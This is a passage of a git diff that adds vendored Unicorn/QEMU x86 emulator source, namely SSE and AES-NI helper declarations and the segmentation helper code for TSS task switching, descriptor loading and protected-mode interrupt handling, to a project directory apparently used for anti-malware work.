env, Reg, Reg) +DEF_HELPER_3(glue(blendvps, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(blendvpd, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(ptest, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pmovsxbw, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pmovsxbd, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pmovsxbq, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pmovsxwd, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pmovsxwq, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pmovsxdq, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pmovzxbw, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pmovzxbd, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pmovzxbq, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pmovzxwd, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pmovzxwq, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pmovzxdq, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pmuldq, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pcmpeqq, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(packusdw, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pminsb, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pminsd, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pminuw, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pminud, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pmaxsb, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pmaxsd, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pmaxuw, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pmaxud, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pmulld, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(phminposuw, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_4(glue(roundps, SUFFIX), void, env, Reg, Reg, i32) +DEF_HELPER_4(glue(roundpd, SUFFIX), void, env, Reg, Reg, i32) +DEF_HELPER_4(glue(roundss, SUFFIX), void, env, Reg, Reg, i32) +DEF_HELPER_4(glue(roundsd, SUFFIX), void, env, Reg, Reg, i32) +DEF_HELPER_4(glue(blendps, SUFFIX), void, env, Reg, Reg, i32) +DEF_HELPER_4(glue(blendpd, SUFFIX), 
void, env, Reg, Reg, i32) +DEF_HELPER_4(glue(pblendw, SUFFIX), void, env, Reg, Reg, i32) +DEF_HELPER_4(glue(dpps, SUFFIX), void, env, Reg, Reg, i32) +DEF_HELPER_4(glue(dppd, SUFFIX), void, env, Reg, Reg, i32) +DEF_HELPER_4(glue(mpsadbw, SUFFIX), void, env, Reg, Reg, i32) +#endif + +/* SSE4.2 op helpers */ +#if SHIFT == 1 +DEF_HELPER_3(glue(pcmpgtq, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_4(glue(pcmpestri, SUFFIX), void, env, Reg, Reg, i32) +DEF_HELPER_4(glue(pcmpestrm, SUFFIX), void, env, Reg, Reg, i32) +DEF_HELPER_4(glue(pcmpistri, SUFFIX), void, env, Reg, Reg, i32) +DEF_HELPER_4(glue(pcmpistrm, SUFFIX), void, env, Reg, Reg, i32) +DEF_HELPER_3(crc32, tl, i32, tl, i32) +DEF_HELPER_3(popcnt, tl, env, tl, i32) +#endif + +/* AES-NI op helpers */ +#if SHIFT == 1 +DEF_HELPER_3(glue(aesdec, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(aesdeclast, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(aesenc, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(aesenclast, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(aesimc, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_4(glue(aeskeygenassist, SUFFIX), void, env, Reg, Reg, i32) +DEF_HELPER_4(glue(pclmulqdq, SUFFIX), void, env, Reg, Reg, i32) +#endif + +#undef SHIFT +#undef Reg +#undef SUFFIX + +#undef SSE_HELPER_B +#undef SSE_HELPER_W +#undef SSE_HELPER_L +#undef SSE_HELPER_Q +#undef SSE_HELPER_S +#undef SSE_HELPER_CMP +#undef UNPCK_OP diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/seg_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/seg_helper.c new file mode 100644 index 0000000..fd9765a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/seg_helper.c @@ -0,0 +1,2698 @@ +/* + * x86 segmentation related helpers: + * TSS, interrupts, system calls, jumps and call/task gates, descriptors + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * 
License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#include "cpu.h" +#include "qemu/log.h" +#include "exec/helper-proto.h" +#include "exec/cpu_ldst.h" +#include "uc_priv.h" + +//#define DEBUG_PCALL + +#ifdef DEBUG_PCALL +# define LOG_PCALL(...) qemu_log_mask(CPU_LOG_PCALL, ## __VA_ARGS__) +# define LOG_PCALL_STATE(cpu) \ + log_cpu_state_mask(CPU_LOG_PCALL, (cpu), CPU_DUMP_CCOP) +#else +# define LOG_PCALL(...) do { } while (0) +# define LOG_PCALL_STATE(cpu) do { } while (0) +#endif + +#ifndef CONFIG_USER_ONLY +#define CPU_MMU_INDEX (cpu_mmu_index_kernel(env)) +#define MEMSUFFIX _kernel +#define DATA_SIZE 1 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 2 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 4 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 8 +#include "exec/cpu_ldst_template.h" +#undef CPU_MMU_INDEX +#undef MEMSUFFIX +#endif + +/* return non zero if error */ +static inline int load_segment(CPUX86State *env, uint32_t *e1_ptr, + uint32_t *e2_ptr, int selector) +{ + SegmentCache *dt; + int index; + target_ulong ptr; + + if (selector & 0x4) { + dt = &env->ldt; + } else { + dt = &env->gdt; + } + index = selector & ~7; + if ((index + 7) > dt->limit) { + return -1; + } + ptr = dt->base + index; + *e1_ptr = cpu_ldl_kernel(env, ptr); + *e2_ptr = cpu_ldl_kernel(env, ptr + 4); + return 0; +} + +static inline unsigned int get_seg_limit(uint32_t e1, uint32_t e2) +{ + unsigned int limit; + + limit = (e1 & 0xffff) | (e2 & 0x000f0000); + if (e2 & DESC_G_MASK) { + limit = (limit 
<< 12) | 0xfff; + } + return limit; +} + +static inline uint32_t get_seg_base(uint32_t e1, uint32_t e2) +{ + return (e1 >> 16) | ((e2 & 0xff) << 16) | (e2 & 0xff000000); +} + +static inline void load_seg_cache_raw_dt(SegmentCache *sc, uint32_t e1, + uint32_t e2) +{ + sc->base = get_seg_base(e1, e2); + sc->limit = get_seg_limit(e1, e2); + sc->flags = e2; +} + +/* init the segment cache in vm86 mode. */ +static inline void load_seg_vm(CPUX86State *env, int seg, int selector) +{ + selector &= 0xffff; + + cpu_x86_load_seg_cache(env, seg, selector, (selector << 4), 0xffff, + DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | + DESC_A_MASK | (3 << DESC_DPL_SHIFT)); +} + +static inline void get_ss_esp_from_tss(CPUX86State *env, uint32_t *ss_ptr, + uint32_t *esp_ptr, int dpl) +{ + X86CPU *cpu = x86_env_get_cpu(env); + int type, index, shift; + +#if 0 + { + int i; + printf("TR: base=%p limit=%x\n", env->tr.base, env->tr.limit); + for (i = 0; i < env->tr.limit; i++) { + printf("%02x ", env->tr.base[i]); + if ((i & 7) == 7) { + printf("\n"); + } + } + printf("\n"); + } +#endif + + if (!(env->tr.flags & DESC_P_MASK)) { + cpu_abort(CPU(cpu), "invalid tss"); + } + type = (env->tr.flags >> DESC_TYPE_SHIFT) & 0xf; + if ((type & 7) != 1) { + cpu_abort(CPU(cpu), "invalid tss type"); + } + shift = type >> 3; + index = (dpl * 4 + 2) << shift; + if (index + (4 << shift) - 1 > env->tr.limit) { + raise_exception_err(env, EXCP0A_TSS, env->tr.selector & 0xfffc); + } + if (shift == 0) { + *esp_ptr = cpu_lduw_kernel(env, env->tr.base + index); + *ss_ptr = cpu_lduw_kernel(env, env->tr.base + index + 2); + } else { + *esp_ptr = cpu_ldl_kernel(env, env->tr.base + index); + *ss_ptr = cpu_lduw_kernel(env, env->tr.base + index + 4); + } +} + +static void tss_load_seg(CPUX86State *env, int seg_reg, int selector, int cpl) +{ + uint32_t e1, e2; + int rpl, dpl; + + if ((selector & 0xfffc) != 0) { + if (load_segment(env, &e1, &e2, selector) != 0) { + raise_exception_err(env, EXCP0A_TSS, selector & 0xfffc); + } 
+ if (!(e2 & DESC_S_MASK)) { + raise_exception_err(env, EXCP0A_TSS, selector & 0xfffc); + } + rpl = selector & 3; + dpl = (e2 >> DESC_DPL_SHIFT) & 3; + if (seg_reg == R_CS) { + if (!(e2 & DESC_CS_MASK)) { + raise_exception_err(env, EXCP0A_TSS, selector & 0xfffc); + } + if (dpl != rpl) { + raise_exception_err(env, EXCP0A_TSS, selector & 0xfffc); + } + } else if (seg_reg == R_SS) { + /* SS must be writable data */ + if ((e2 & DESC_CS_MASK) || !(e2 & DESC_W_MASK)) { + raise_exception_err(env, EXCP0A_TSS, selector & 0xfffc); + } + if (dpl != cpl || dpl != rpl) { + raise_exception_err(env, EXCP0A_TSS, selector & 0xfffc); + } + } else { + /* not readable code */ + if ((e2 & DESC_CS_MASK) && !(e2 & DESC_R_MASK)) { + raise_exception_err(env, EXCP0A_TSS, selector & 0xfffc); + } + /* if data or non conforming code, checks the rights */ + if (((e2 >> DESC_TYPE_SHIFT) & 0xf) < 12) { + if (dpl < cpl || dpl < rpl) { + raise_exception_err(env, EXCP0A_TSS, selector & 0xfffc); + } + } + } + if (!(e2 & DESC_P_MASK)) { + raise_exception_err(env, EXCP0B_NOSEG, selector & 0xfffc); + } + cpu_x86_load_seg_cache(env, seg_reg, selector, + get_seg_base(e1, e2), + get_seg_limit(e1, e2), + e2); + } else { + if (seg_reg == R_SS || seg_reg == R_CS) { + raise_exception_err(env, EXCP0A_TSS, selector & 0xfffc); + } + } +} + +#define SWITCH_TSS_JMP 0 +#define SWITCH_TSS_IRET 1 +#define SWITCH_TSS_CALL 2 + +/* XXX: restore CPU state in registers (PowerPC case) */ +static void switch_tss(CPUX86State *env, int tss_selector, + uint32_t e1, uint32_t e2, int source, + uint32_t next_eip) +{ + int tss_limit, tss_limit_max, type, old_tss_limit_max, old_type, v1, v2, i; + target_ulong tss_base; + uint32_t new_regs[8], new_segs[6]; + uint32_t new_eflags, new_eip, new_cr3, new_ldt, new_trap; + uint32_t old_eflags, eflags_mask; + SegmentCache *dt; + int index; + target_ulong ptr; + + type = (e2 >> DESC_TYPE_SHIFT) & 0xf; + LOG_PCALL("switch_tss: sel=0x%04x type=%d src=%d\n", tss_selector, type, + source); + + 
/* if task gate, we read the TSS segment and we load it */ + if (type == 5) { + if (!(e2 & DESC_P_MASK)) { + raise_exception_err(env, EXCP0B_NOSEG, tss_selector & 0xfffc); + } + tss_selector = e1 >> 16; + if (tss_selector & 4) { + raise_exception_err(env, EXCP0A_TSS, tss_selector & 0xfffc); + } + if (load_segment(env, &e1, &e2, tss_selector) != 0) { + raise_exception_err(env, EXCP0D_GPF, tss_selector & 0xfffc); + } + if (e2 & DESC_S_MASK) { + raise_exception_err(env, EXCP0D_GPF, tss_selector & 0xfffc); + } + type = (e2 >> DESC_TYPE_SHIFT) & 0xf; + if ((type & 7) != 1) { + raise_exception_err(env, EXCP0D_GPF, tss_selector & 0xfffc); + } + } + + if (!(e2 & DESC_P_MASK)) { + raise_exception_err(env, EXCP0B_NOSEG, tss_selector & 0xfffc); + } + + if (type & 8) { + tss_limit_max = 103; + } else { + tss_limit_max = 43; + } + tss_limit = get_seg_limit(e1, e2); + tss_base = get_seg_base(e1, e2); + if ((tss_selector & 4) != 0 || + tss_limit < tss_limit_max) { + raise_exception_err(env, EXCP0A_TSS, tss_selector & 0xfffc); + } + old_type = (env->tr.flags >> DESC_TYPE_SHIFT) & 0xf; + if (old_type & 8) { + old_tss_limit_max = 103; + } else { + old_tss_limit_max = 43; + } + + /* read all the registers from the new TSS */ + if (type & 8) { + /* 32 bit */ + new_cr3 = cpu_ldl_kernel(env, tss_base + 0x1c); + new_eip = cpu_ldl_kernel(env, tss_base + 0x20); + new_eflags = cpu_ldl_kernel(env, tss_base + 0x24); + for (i = 0; i < 8; i++) { + new_regs[i] = cpu_ldl_kernel(env, tss_base + (0x28 + i * 4)); + } + for (i = 0; i < 6; i++) { + new_segs[i] = cpu_lduw_kernel(env, tss_base + (0x48 + i * 4)); + } + new_ldt = cpu_lduw_kernel(env, tss_base + 0x60); + new_trap = cpu_ldl_kernel(env, tss_base + 0x64); + } else { + /* 16 bit */ + new_cr3 = 0; + new_eip = cpu_lduw_kernel(env, tss_base + 0x0e); + new_eflags = cpu_lduw_kernel(env, tss_base + 0x10); + for (i = 0; i < 8; i++) { + new_regs[i] = cpu_lduw_kernel(env, tss_base + (0x12 + i * 2)) | + 0xffff0000; + } + for (i = 0; i < 4; i++) { + 
new_segs[i] = cpu_lduw_kernel(env, tss_base + (0x22 + i * 4)); + } + new_ldt = cpu_lduw_kernel(env, tss_base + 0x2a); + new_segs[R_FS] = 0; + new_segs[R_GS] = 0; + new_trap = 0; + } + /* XXX: avoid a compiler warning, see + http://support.amd.com/us/Processor_TechDocs/24593.pdf + chapters 12.2.5 and 13.2.4 on how to implement TSS Trap bit */ + (void)new_trap; + + /* NOTE: we must avoid memory exceptions during the task switch, + so we make dummy accesses before */ + /* XXX: it can still fail in some cases, so a bigger hack is + necessary to valid the TLB after having done the accesses */ + + v1 = cpu_ldub_kernel(env, env->tr.base); + v2 = cpu_ldub_kernel(env, env->tr.base + old_tss_limit_max); + cpu_stb_kernel(env, env->tr.base, v1); + cpu_stb_kernel(env, env->tr.base + old_tss_limit_max, v2); + + /* clear busy bit (it is restartable) */ + if (source == SWITCH_TSS_JMP || source == SWITCH_TSS_IRET) { + target_ulong ptr; + uint32_t e2; + + ptr = env->gdt.base + (env->tr.selector & ~7); + e2 = cpu_ldl_kernel(env, ptr + 4); + e2 &= ~DESC_TSS_BUSY_MASK; + cpu_stl_kernel(env, ptr + 4, e2); + } + old_eflags = cpu_compute_eflags(env); + if (source == SWITCH_TSS_IRET) { + old_eflags &= ~NT_MASK; + } + + /* save the current state in the old TSS */ + if (type & 8) { + /* 32 bit */ + cpu_stl_kernel(env, env->tr.base + 0x20, next_eip); + cpu_stl_kernel(env, env->tr.base + 0x24, old_eflags); + cpu_stl_kernel(env, env->tr.base + (0x28 + 0 * 4), env->regs[R_EAX]); + cpu_stl_kernel(env, env->tr.base + (0x28 + 1 * 4), env->regs[R_ECX]); + cpu_stl_kernel(env, env->tr.base + (0x28 + 2 * 4), env->regs[R_EDX]); + cpu_stl_kernel(env, env->tr.base + (0x28 + 3 * 4), env->regs[R_EBX]); + cpu_stl_kernel(env, env->tr.base + (0x28 + 4 * 4), env->regs[R_ESP]); + cpu_stl_kernel(env, env->tr.base + (0x28 + 5 * 4), env->regs[R_EBP]); + cpu_stl_kernel(env, env->tr.base + (0x28 + 6 * 4), env->regs[R_ESI]); + cpu_stl_kernel(env, env->tr.base + (0x28 + 7 * 4), env->regs[R_EDI]); + for (i = 0; i < 6; 
i++) { + cpu_stw_kernel(env, env->tr.base + (0x48 + i * 4), + env->segs[i].selector); + } + } else { + /* 16 bit */ + cpu_stw_kernel(env, env->tr.base + 0x0e, next_eip); + cpu_stw_kernel(env, env->tr.base + 0x10, old_eflags); + cpu_stw_kernel(env, env->tr.base + (0x12 + 0 * 2), env->regs[R_EAX]); + cpu_stw_kernel(env, env->tr.base + (0x12 + 1 * 2), env->regs[R_ECX]); + cpu_stw_kernel(env, env->tr.base + (0x12 + 2 * 2), env->regs[R_EDX]); + cpu_stw_kernel(env, env->tr.base + (0x12 + 3 * 2), env->regs[R_EBX]); + cpu_stw_kernel(env, env->tr.base + (0x12 + 4 * 2), env->regs[R_ESP]); + cpu_stw_kernel(env, env->tr.base + (0x12 + 5 * 2), env->regs[R_EBP]); + cpu_stw_kernel(env, env->tr.base + (0x12 + 6 * 2), env->regs[R_ESI]); + cpu_stw_kernel(env, env->tr.base + (0x12 + 7 * 2), env->regs[R_EDI]); + for (i = 0; i < 4; i++) { + cpu_stw_kernel(env, env->tr.base + (0x22 + i * 4), + env->segs[i].selector); + } + } + + /* now if an exception occurs, it will occurs in the next task + context */ + + if (source == SWITCH_TSS_CALL) { + cpu_stw_kernel(env, tss_base, env->tr.selector); + new_eflags |= NT_MASK; + } + + /* set busy bit */ + if (source == SWITCH_TSS_JMP || source == SWITCH_TSS_CALL) { + target_ulong ptr; + uint32_t e2; + + ptr = env->gdt.base + (tss_selector & ~7); + e2 = cpu_ldl_kernel(env, ptr + 4); + e2 |= DESC_TSS_BUSY_MASK; + cpu_stl_kernel(env, ptr + 4, e2); + } + + /* set the new CPU state */ + /* from this point, any exception which occurs can give problems */ + env->cr[0] |= CR0_TS_MASK; + env->hflags |= HF_TS_MASK; + env->tr.selector = tss_selector; + env->tr.base = tss_base; + env->tr.limit = tss_limit; + env->tr.flags = e2 & ~DESC_TSS_BUSY_MASK; + + if ((type & 8) && (env->cr[0] & CR0_PG_MASK)) { + cpu_x86_update_cr3(env, new_cr3); + } + + /* load all registers without an exception, then reload them with + possible exception */ + env->eip = new_eip; + eflags_mask = TF_MASK | AC_MASK | ID_MASK | + IF_MASK | IOPL_MASK | VM_MASK | RF_MASK | NT_MASK; + if 
(!(type & 8)) { + eflags_mask &= 0xffff; + } + cpu_load_eflags(env, new_eflags, eflags_mask); + /* XXX: what to do in 16 bit case? */ + env->regs[R_EAX] = new_regs[0]; + env->regs[R_ECX] = new_regs[1]; + env->regs[R_EDX] = new_regs[2]; + env->regs[R_EBX] = new_regs[3]; + env->regs[R_ESP] = new_regs[4]; + env->regs[R_EBP] = new_regs[5]; + env->regs[R_ESI] = new_regs[6]; + env->regs[R_EDI] = new_regs[7]; + if (new_eflags & VM_MASK) { + for (i = 0; i < 6; i++) { + load_seg_vm(env, i, new_segs[i]); + } + } else { + /* first just selectors as the rest may trigger exceptions */ + for (i = 0; i < 6; i++) { + cpu_x86_load_seg_cache(env, i, new_segs[i], 0, 0, 0); + } + } + + env->ldt.selector = new_ldt & ~4; + env->ldt.base = 0; + env->ldt.limit = 0; + env->ldt.flags = 0; + + /* load the LDT */ + if (new_ldt & 4) { + raise_exception_err(env, EXCP0A_TSS, new_ldt & 0xfffc); + } + + if ((new_ldt & 0xfffc) != 0) { + dt = &env->gdt; + index = new_ldt & ~7; + if ((index + 7) > dt->limit) { + raise_exception_err(env, EXCP0A_TSS, new_ldt & 0xfffc); + } + ptr = dt->base + index; + e1 = cpu_ldl_kernel(env, ptr); + e2 = cpu_ldl_kernel(env, ptr + 4); + if ((e2 & DESC_S_MASK) || ((e2 >> DESC_TYPE_SHIFT) & 0xf) != 2) { + raise_exception_err(env, EXCP0A_TSS, new_ldt & 0xfffc); + } + if (!(e2 & DESC_P_MASK)) { + raise_exception_err(env, EXCP0A_TSS, new_ldt & 0xfffc); + } + load_seg_cache_raw_dt(&env->ldt, e1, e2); + } + + /* load the segments */ + if (!(new_eflags & VM_MASK)) { + int cpl = new_segs[R_CS] & 3; + tss_load_seg(env, R_CS, new_segs[R_CS], cpl); + tss_load_seg(env, R_SS, new_segs[R_SS], cpl); + tss_load_seg(env, R_ES, new_segs[R_ES], cpl); + tss_load_seg(env, R_DS, new_segs[R_DS], cpl); + tss_load_seg(env, R_FS, new_segs[R_FS], cpl); + tss_load_seg(env, R_GS, new_segs[R_GS], cpl); + } + + /* check that env->eip is in the CS segment limits */ + if (new_eip > env->segs[R_CS].limit) { + /* XXX: different exception if CALL? 
*/ + raise_exception_err(env, EXCP0D_GPF, 0); + } + +#ifndef CONFIG_USER_ONLY + /* reset local breakpoints */ + if (env->dr[7] & DR7_LOCAL_BP_MASK) { + for (i = 0; i < DR7_MAX_BP; i++) { + if (hw_local_breakpoint_enabled(env->dr[7], i) && + !hw_global_breakpoint_enabled(env->dr[7], i)) { + hw_breakpoint_remove(env, i); + } + } + env->dr[7] &= ~DR7_LOCAL_BP_MASK; + } +#endif +} + +static inline unsigned int get_sp_mask(unsigned int e2) +{ + if (e2 & DESC_B_MASK) { + return 0xffffffff; + } else { + return 0xffff; + } +} + +static int exception_has_error_code(int intno) +{ + switch (intno) { + case 8: + case 10: + case 11: + case 12: + case 13: + case 14: + case 17: + return 1; + } + return 0; +} + +#ifdef TARGET_X86_64 +#define SET_ESP(val, sp_mask) \ + do { \ + if ((sp_mask) == 0xffff) { \ + env->regs[R_ESP] = (env->regs[R_ESP] & ~0xffff) | \ + ((val) & 0xffff); \ + } else if ((sp_mask) == 0xffffffffLL) { \ + env->regs[R_ESP] = (uint32_t)(val); \ + } else { \ + env->regs[R_ESP] = (val); \ + } \ + } while (0) +#else +#define SET_ESP(val, sp_mask) \ + do { \ + env->regs[R_ESP] = (env->regs[R_ESP] & ~(sp_mask)) | \ + ((val) & (sp_mask)); \ + } while (0) +#endif + +/* in 64-bit machines, this can overflow. 
So this segment addition macro + * can be used to trim the value to 32-bit whenever needed */ +#define SEG_ADDL(ssp, sp, sp_mask) ((uint32_t)((ssp) + (sp & (sp_mask)))) + +/* XXX: add a is_user flag to have proper security support */ +#define PUSHW(ssp, sp, sp_mask, val) \ + { \ + sp -= 2; \ + cpu_stw_kernel(env, (ssp) + (sp & (sp_mask)), (val)); \ + } + +#define PUSHL(ssp, sp, sp_mask, val) \ + { \ + sp -= 4; \ + cpu_stl_kernel(env, SEG_ADDL(ssp, sp, sp_mask), (uint32_t)(val)); \ + } + +#define POPW(ssp, sp, sp_mask, val) \ + { \ + val = cpu_lduw_kernel(env, (ssp) + (sp & (sp_mask))); \ + sp += 2; \ + } + +#define POPL(ssp, sp, sp_mask, val) \ + { \ + val = (uint32_t)cpu_ldl_kernel(env, SEG_ADDL(ssp, sp, sp_mask)); \ + sp += 4; \ + } + +/* protected mode interrupt */ +static void do_interrupt_protected(CPUX86State *env, int intno, int is_int, + int error_code, unsigned int next_eip, + int is_hw) // qq +{ + SegmentCache *dt; + target_ulong ptr, ssp; + int type, dpl, selector, ss_dpl, cpl; + int has_error_code, new_stack, shift; + uint32_t e1, e2, offset, ss = 0, esp, ss_e1 = 0, ss_e2 = 0; + uint32_t old_eip, sp_mask; + int vm86 = env->eflags & VM_MASK; + + has_error_code = 0; + if (!is_int && !is_hw) { + has_error_code = exception_has_error_code(intno); + } + if (is_int) { + old_eip = next_eip; + } else { + old_eip = env->eip; + } + + dt = &env->idt; + if (intno * 8 + 7 > dt->limit) { + raise_exception_err(env, EXCP0D_GPF, intno * 8 + 2); + } + ptr = dt->base + intno * 8; + e1 = cpu_ldl_kernel(env, ptr); + e2 = cpu_ldl_kernel(env, ptr + 4); + /* check gate type */ + type = (e2 >> DESC_TYPE_SHIFT) & 0x1f; + switch (type) { + case 5: /* task gate */ + /* must do that check here to return the correct error code */ + if (!(e2 & DESC_P_MASK)) { + raise_exception_err(env, EXCP0B_NOSEG, intno * 8 + 2); + } + switch_tss(env, intno * 8, e1, e2, SWITCH_TSS_CALL, old_eip); + if (has_error_code) { + int type; + uint32_t mask; + + /* push the error code */ + type = 
(env->tr.flags >> DESC_TYPE_SHIFT) & 0xf; + shift = type >> 3; + if (env->segs[R_SS].flags & DESC_B_MASK) { + mask = 0xffffffff; + } else { + mask = 0xffff; + } + esp = (env->regs[R_ESP] - (2 << shift)) & mask; + ssp = env->segs[R_SS].base + esp; + if (shift) { + cpu_stl_kernel(env, ssp, error_code); + } else { + cpu_stw_kernel(env, ssp, error_code); + } + SET_ESP(esp, mask); + } + return; + case 6: /* 286 interrupt gate */ + case 7: /* 286 trap gate */ + case 14: /* 386 interrupt gate */ + case 15: /* 386 trap gate */ + break; + default: + raise_exception_err(env, EXCP0D_GPF, intno * 8 + 2); + break; + } + dpl = (e2 >> DESC_DPL_SHIFT) & 3; + cpl = env->hflags & HF_CPL_MASK; + /* check privilege if software int */ + if (is_int && dpl < cpl) { + raise_exception_err(env, EXCP0D_GPF, intno * 8 + 2); + } + /* check valid bit */ + if (!(e2 & DESC_P_MASK)) { + raise_exception_err(env, EXCP0B_NOSEG, intno * 8 + 2); + } + selector = e1 >> 16; + offset = (e2 & 0xffff0000) | (e1 & 0x0000ffff); + if ((selector & 0xfffc) == 0) { + raise_exception_err(env, EXCP0D_GPF, 0); + } + if (load_segment(env, &e1, &e2, selector) != 0) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + if (!(e2 & DESC_S_MASK) || !(e2 & (DESC_CS_MASK))) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + dpl = (e2 >> DESC_DPL_SHIFT) & 3; + if (dpl > cpl) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + if (!(e2 & DESC_P_MASK)) { + raise_exception_err(env, EXCP0B_NOSEG, selector & 0xfffc); + } + if (!(e2 & DESC_C_MASK) && dpl < cpl) { + /* to inner privilege */ + get_ss_esp_from_tss(env, &ss, &esp, dpl); + if ((ss & 0xfffc) == 0) { + raise_exception_err(env, EXCP0A_TSS, ss & 0xfffc); + } + if ((ss & 3) != dpl) { + raise_exception_err(env, EXCP0A_TSS, ss & 0xfffc); + } + if (load_segment(env, &ss_e1, &ss_e2, ss) != 0) { + raise_exception_err(env, EXCP0A_TSS, ss & 0xfffc); + } + ss_dpl = (ss_e2 >> DESC_DPL_SHIFT) & 3; + if (ss_dpl != dpl) { + 
raise_exception_err(env, EXCP0A_TSS, ss & 0xfffc); + } + if (!(ss_e2 & DESC_S_MASK) || + (ss_e2 & DESC_CS_MASK) || + !(ss_e2 & DESC_W_MASK)) { + raise_exception_err(env, EXCP0A_TSS, ss & 0xfffc); + } + if (!(ss_e2 & DESC_P_MASK)) { + raise_exception_err(env, EXCP0A_TSS, ss & 0xfffc); + } + new_stack = 1; + sp_mask = get_sp_mask(ss_e2); + ssp = get_seg_base(ss_e1, ss_e2); + } else if ((e2 & DESC_C_MASK) || dpl == cpl) { + /* to same privilege */ + if (vm86) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + new_stack = 0; + sp_mask = get_sp_mask(env->segs[R_SS].flags); + ssp = env->segs[R_SS].base; + esp = env->regs[R_ESP]; + dpl = cpl; + } else { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + new_stack = 0; /* avoid warning */ + sp_mask = 0; /* avoid warning */ + ssp = 0; /* avoid warning */ + esp = 0; /* avoid warning */ + } + + shift = type >> 3; + +#if 0 + /* XXX: check that enough room is available */ + push_size = 6 + (new_stack << 2) + (has_error_code << 1); + if (vm86) { + push_size += 8; + } + push_size <<= shift; +#endif + if (shift == 1) { + if (new_stack) { + if (vm86) { + PUSHL(ssp, esp, sp_mask, env->segs[R_GS].selector); + PUSHL(ssp, esp, sp_mask, env->segs[R_FS].selector); + PUSHL(ssp, esp, sp_mask, env->segs[R_DS].selector); + PUSHL(ssp, esp, sp_mask, env->segs[R_ES].selector); + } + PUSHL(ssp, esp, sp_mask, env->segs[R_SS].selector); + PUSHL(ssp, esp, sp_mask, env->regs[R_ESP]); + } + PUSHL(ssp, esp, sp_mask, cpu_compute_eflags(env)); + PUSHL(ssp, esp, sp_mask, env->segs[R_CS].selector); + PUSHL(ssp, esp, sp_mask, old_eip); + if (has_error_code) { + PUSHL(ssp, esp, sp_mask, error_code); + } + } else { + if (new_stack) { + if (vm86) { + PUSHW(ssp, esp, sp_mask, env->segs[R_GS].selector); + PUSHW(ssp, esp, sp_mask, env->segs[R_FS].selector); + PUSHW(ssp, esp, sp_mask, env->segs[R_DS].selector); + PUSHW(ssp, esp, sp_mask, env->segs[R_ES].selector); + } + PUSHW(ssp, esp, sp_mask, env->segs[R_SS].selector); + PUSHW(ssp, 
